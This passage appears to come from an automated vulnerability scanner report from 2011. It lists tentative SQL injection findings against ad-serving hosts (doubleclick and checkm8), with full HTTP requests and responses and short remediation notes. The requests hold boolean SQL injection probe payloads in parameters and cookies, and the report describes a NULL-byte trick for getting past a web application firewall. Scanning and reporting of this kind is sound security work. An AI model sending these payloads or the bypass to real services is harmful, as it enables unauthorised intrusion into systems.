GET /pagead/ads?client=ca-pub-7832112837345590&output=html&h=90&slotname=9104404504&w=728&lmt=1316256718&flash=10.3.183&url=http%3A%2F%2Fwww.toofab.com%2F&dt=1316238718628&bpp=11&shv=r20110907&jsv=r20110914%2527%2527&correlator=1316238718686&frm=4&adk=3292020828&ga_vid=1160930501.1316238719&ga_sid=1316238719&ga_hid=1889546765&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=16&biw=1071&bih=870&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=144&xpc=u82iW5Sevj&p=http%3A//www.toofab.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT
|
Response 2
HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Set-Cookie: test_cookie=; domain=.doubleclick.net; path=/; Max-Age=0; expires=Mon, 21-July-2008 23:59:00 GMT
X-Content-Type-Options: nosniff
Date: Sat, 17 Sep 2011 00:56:46 GMT
Server: cafe
Cache-Control: private
Content-Length: 3910
X-XSS-Protection: 1; mode=block
Expires: Sat, 17 Sep 2011 00:56:46 GMT
<!doctype html><html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=functio
...[SNIP]...
|
1.11. http://googleads.g.doubleclick.net/pagead/ads [slotname parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Tentative |
| Host: |
http://googleads.g.doubleclick.net |
| Path: |
/pagead/ads |
Issue detail
The slotname parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the slotname parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /pagead/ads?client=ca-pub-7832112837345590&output=html&h=250&slotname=7188170409%00'&w=300&lmt=1316256959&flash=10.3.183&url=http%3A%2F%2Fwww.tmz.com%2F2011%2F09%2F16%2Fnancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars%2F&dt=1316238959258&bpp=13&shv=r20110907&jsv=r20110914&prev_slotnames=9104404504%2C7188170409&correlator=1316238953178&frm=4&adk=672172102&ga_vid=563675983.1316238953&ga_sid=1316238953&ga_hid=1468752110&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=14&adx=688&ady=2313&biw=1071&bih=870&eid=36887102&ref=http%3A%2F%2Fwww.tmz.com%2F&prodhost=googleads.g.doubleclick.net&fu=0&ifi=3&dtd=309&xpc=KJhLYOB9rm&p=http%3A//www.tmz.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT
|
Response 1
HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 17 Sep 2011 01:00:35 GMT
Server: cafe
Cache-Control: private
Content-Length: 4567
X-XSS-Protection: 1; mode=block
<!doctype html><html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=functio
...[SNIP]...
i = d.indexOf("&");var r = '';if (ei >= 0)r = d.substring(ei, d.length);a.href = c + t + r; } else {a.href += "&clkt=" + t;}}return true;}(function(){var f=function(){var a=-1;try{htet()}catch(b){if(b.stack){var c=b.stack,a=c.split(" at").length-1;a==0&&(a=c.split(")@").length-1);a=a>
...[SNIP]...
|
Request 2
GET /pagead/ads?client=ca-pub-7832112837345590&output=html&h=250&slotname=7188170409%00''&w=300&lmt=1316256959&flash=10.3.183&url=http%3A%2F%2Fwww.tmz.com%2F2011%2F09%2F16%2Fnancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars%2F&dt=1316238959258&bpp=13&shv=r20110907&jsv=r20110914&prev_slotnames=9104404504%2C7188170409&correlator=1316238953178&frm=4&adk=672172102&ga_vid=563675983.1316238953&ga_sid=1316238953&ga_hid=1468752110&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=14&adx=688&ady=2313&biw=1071&bih=870&eid=36887102&ref=http%3A%2F%2Fwww.tmz.com%2F&prodhost=googleads.g.doubleclick.net&fu=0&ifi=3&dtd=309&xpc=KJhLYOB9rm&p=http%3A//www.tmz.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT
|
Response 2
HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Set-Cookie: test_cookie=; domain=.doubleclick.net; path=/; Max-Age=0; expires=Mon, 21-July-2008 23:59:00 GMT
X-Content-Type-Options: nosniff
Date: Sat, 17 Sep 2011 01:00:37 GMT
Server: cafe
Cache-Control: private
Content-Length: 4052
X-XSS-Protection: 1; mode=block
Expires: Sat, 17 Sep 2011 01:00:37 GMT
<!doctype html><html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=functio
...[SNIP]...
|
1.12. http://googleads.g.doubleclick.net/pagead/ads [url parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Tentative |
| Host: |
http://googleads.g.doubleclick.net |
| Path: |
/pagead/ads |
Issue detail
The url parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the url parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /pagead/ads?client=ca-pub-7832112837345590&output=html&h=90&slotname=9104404504&w=728&lmt=1316256718&flash=10.3.183&url=http%3A%2F%2Fwww.toofab.com%2F%00'&dt=1316238718628&bpp=11&shv=r20110907&jsv=r20110914&correlator=1316238718686&frm=4&adk=3292020828&ga_vid=1160930501.1316238719&ga_sid=1316238719&ga_hid=1889546765&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=16&biw=1071&bih=870&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=144&xpc=u82iW5Sevj&p=http%3A//www.toofab.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT
|
Response 1
HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 17 Sep 2011 00:55:20 GMT
Server: cafe
Cache-Control: private
Content-Length: 5987
X-XSS-Protection: 1; mode=block
<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><!-- Template Id = 12,381 Template Name = In-Page Flash Banner w/ DoubleVerifyTag - DFA -->
<!-- Copyright 2009 D
...[SNIP]...
ash"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y,pVF.indexOf(".",y));}}
else if (window.ActiveXObject && window.execScript){
window.execScript('on error resume next\npVM=2\ndo\npVM=pVM+1\nset swControl = CreateObject("ShockwaveFlash.ShockwaveFlash."&pVM)\nloop while Err = 0\nOn Error Resume Next\npVM=pVM-1\nSub '+DCid+'_FSCommand(ByVal command, ByVal
...[SNIP]...
|
Request 2
GET /pagead/ads?client=ca-pub-7832112837345590&output=html&h=90&slotname=9104404504&w=728&lmt=1316256718&flash=10.3.183&url=http%3A%2F%2Fwww.toofab.com%2F%00''&dt=1316238718628&bpp=11&shv=r20110907&jsv=r20110914&correlator=1316238718686&frm=4&adk=3292020828&ga_vid=1160930501.1316238719&ga_sid=1316238719&ga_hid=1889546765&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=16&biw=1071&bih=870&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=144&xpc=u82iW5Sevj&p=http%3A//www.toofab.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT
|
Response 2
HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 17 Sep 2011 00:55:21 GMT
Server: cafe
Cache-Control: private
Content-Length: 3806
X-XSS-Protection: 1; mode=block
<!doctype html><html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=functio
...[SNIP]...
|
1.13. http://q1.checkm8.com/adam/detect [C cookie]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Tentative |
| Host: |
http://q1.checkm8.com |
| Path: |
/adam/detect |
Issue detail
The C cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the C cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /adam/detect?cat=Boston_Herald.Track.Front&page=009300128789618611&serial=1000:1:A&&LOC=http://bostonherald.com/track/&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=01&RES=RS21&ORD=061694151954725385&req=fr&& HTTP/1.1
Host: q1.checkm8.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/track/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110913120144,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1315915303; R=cHONU9wbaaaaa%00%00%00aa; A=dvV7X9wA5Q7MvENT06Sba; C=ovV7X9we5HXUcgaIa4OQ95t'%20and%201%3d1--%20; O=evV7X9wkgMMSg3IdGwNbO0jnNbnU3Lca
|
Response 1
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:20:56 GMT
Server: Apache
P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.15 NY-AD5
Set-cookie: A=dvV7X9wQ0M8MvENT06Sba;Path=/;
Set-cookie: C=oBK8X9we5HXUcgaJa4OQ95t;Path=/;Expires=Fri, 01-Feb-2075 04:54:15 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.q1.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 143300170/1217096312/1137740046/2570514078
x-internal-selected:
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript
... |
Request 2
GET /adam/detect?cat=Boston_Herald.Track.Front&page=009300128789618611&serial=1000:1:A&&LOC=http://bostonherald.com/track/&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=01&RES=RS21&ORD=061694151954725385&req=fr&& HTTP/1.1
Host: q1.checkm8.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/track/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110913120144,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1315915303; R=cHONU9wbaaaaa%00%00%00aa; A=dvV7X9wA5Q7MvENT06Sba; C=ovV7X9we5HXUcgaIa4OQ95t'%20and%201%3d2--%20; O=evV7X9wkgMMSg3IdGwNbO0jnNbnU3Lca
|
Response 2
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:20:56 GMT
Server: Apache
P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.15 NY-AD5
Set-cookie: C=oBK8X9we5HXUcgaJa4OQ95t;Path=/;Expires=Fri, 01-Feb-2075 04:54:15 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.q1.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 143300170/1217096312/1137740046/2570514078
x-internal-selected:
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript
... |
1.14. http://q1.checkm8.com/adam/detect [WIDTH_RANGE parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Tentative |
| Host: |
http://q1.checkm8.com |
| Path: |
/adam/detect |
Issue detail
The WIDTH_RANGE parameter appears to be vulnerable to SQL injection attacks. The payloads 20440401'%20or%201%3d1--%20 and 20440401'%20or%201%3d2--%20 were each submitted in the WIDTH_RANGE parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /adam/detect?cat=Boston_Herald.Track.Front&page=6802504919469357&serial=1000:1:A&&LOC=http://bostonherald.com/track/&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D20440401'%20or%201%3d1--%20&DATE=01110917&HOUR=01&RES=RS21&ORD=6767618621233851&req=fr&& HTTP/1.1
Host: q1.checkm8.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/track/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110913120144,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1315915303; R=cHONU9wbaaaaa%00%00%00aa; O=evV7X9wkgMMSg3IdGwNbO0jnNbnU3Lca; A=dvV7X9wOL36ZvENT06Sba; C=ouX7X9wuHKW7cgaJa4OQ95t
|
Response 1
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:29:51 GMT
Server: Apache
P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.19 ny-ad9
Set-cookie: A=dvV7X9wDYV63vENT06Sba;Path=/;
Set-cookie: C=ofT8X9w5U7VGdga6b4OQ95t;Path=/;Expires=Fri, 01-Feb-2075 05:03:11 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.q1.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 174630063/1248394023/1137740046/2570514078
x-internal-selected:
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript
... |
Request 2
GET /adam/detect?cat=Boston_Herald.Track.Front&page=6802504919469357&serial=1000:1:A&&LOC=http://bostonherald.com/track/&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D20440401'%20or%201%3d2--%20&DATE=01110917&HOUR=01&RES=RS21&ORD=6767618621233851&req=fr&& HTTP/1.1
Host: q1.checkm8.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/track/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110913120144,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1315915303; R=cHONU9wbaaaaa%00%00%00aa; O=evV7X9wkgMMSg3IdGwNbO0jnNbnU3Lca; A=dvV7X9wOL36ZvENT06Sba; C=ouX7X9wuHKW7cgaJa4OQ95t
|
Response 2
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:29:52 GMT
Server: Apache
P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.19 ny-ad9
Set-cookie: C=ogT8X9w5U7VGdga7b4OQ95t;Path=/;Expires=Fri, 01-Feb-2075 05:03:12 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.q1.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 174630063/1248394023/1137740046/2570514078
x-internal-selected:
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript
... |
1.15. http://q1.checkm8.com/adam/detect [cat parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Tentative |
| Host: |
http://q1.checkm8.com |
| Path: |
/adam/detect |
Issue detail
The cat parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the cat parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /adam/detect?cat=Boston_Herald.Track.Front'%20and%201%3d1--%20&page=009300128789618611&serial=1000:1:A&&LOC=http://bostonherald.com/track/&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=01&RES=RS21&ORD=061694151954725385&req=fr&& HTTP/1.1
Host: q1.checkm8.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/track/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110913120144,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1315915303; R=cHONU9wbaaaaa%00%00%00aa; A=dvV7X9wA5Q7MvENT06Sba; C=ovV7X9we5HXUcgaIa4OQ95t; O=evV7X9wkgMMSg3IdGwNbO0jnNbnU3Lca
|
Response 1
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:20:06 GMT
Server: Apache
P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.19 ny-ad9
Set-cookie: A=dJJ8X9w40K63vtRS57Oca;Path=/;
Set-cookie: C=oNJ8X9wxYWVGdgaYa4OQ95t;Path=/;Expires=Fri, 01-Feb-2075 04:53:25 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.q1.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 174609135/1248373032/1137740046/4118631499
x-internal-selected:
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript
... |
Request 2
GET /adam/detect?cat=Boston_Herald.Track.Front'%20and%201%3d2--%20&page=009300128789618611&serial=1000:1:A&&LOC=http://bostonherald.com/track/&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=01&RES=RS21&ORD=061694151954725385&req=fr&& HTTP/1.1
Host: q1.checkm8.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/track/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110913120144,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1315915303; R=cHONU9wbaaaaa%00%00%00aa; A=dvV7X9wA5Q7MvENT06Sba; C=ovV7X9we5HXUcgaIa4OQ95t; O=evV7X9wkgMMSg3IdGwNbO0jnNbnU3Lca
|
Response 2
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:20:06 GMT
Server: Apache
P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.19 ny-ad9
Set-cookie: C=oNJ8X9wxYWVGdgaZa4OQ95t;Path=/;Expires=Fri, 01-Feb-2075 04:53:25 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.q1.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 174609135/1248373032/1137740046/4118631499
x-internal-selected:
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript
... |
1.16. http://q1.checkm8.com/adam/detect [name of an arbitrarily supplied request parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Tentative |
| Host: |
http://q1.checkm8.com |
| Path: |
/adam/detect |
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /adam/detect?cat=Boston_Herald.Track.Front&page=009300128789618611&serial=1000:1:A&&LOC=http://bostonherald.com/track/&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=01&RES=RS21&ORD=061694151954725385&req=fr&&&1%20and%201%3d1--%20=1 HTTP/1.1
Host: q1.checkm8.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/track/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110913120144,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1315915303; R=cHONU9wbaaaaa%00%00%00aa; A=dvV7X9wA5Q7MvENT06Sba; C=ovV7X9we5HXUcgaIa4OQ95t; O=evV7X9wkgMMSg3IdGwNbO0jnNbnU3Lca
|
Response 1
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:21:05 GMT
Server: Apache
P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.16 NY-AD6
Set-cookie: A=dvV7X9wRIMMRvENT06Sba;Path=/;
Set-cookie: C=oLK8X9wHI86Ycga5a4OQ95t;Path=/;Expires=Fri, 01-Feb-2075 04:54:25 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.q1.checkm8.com
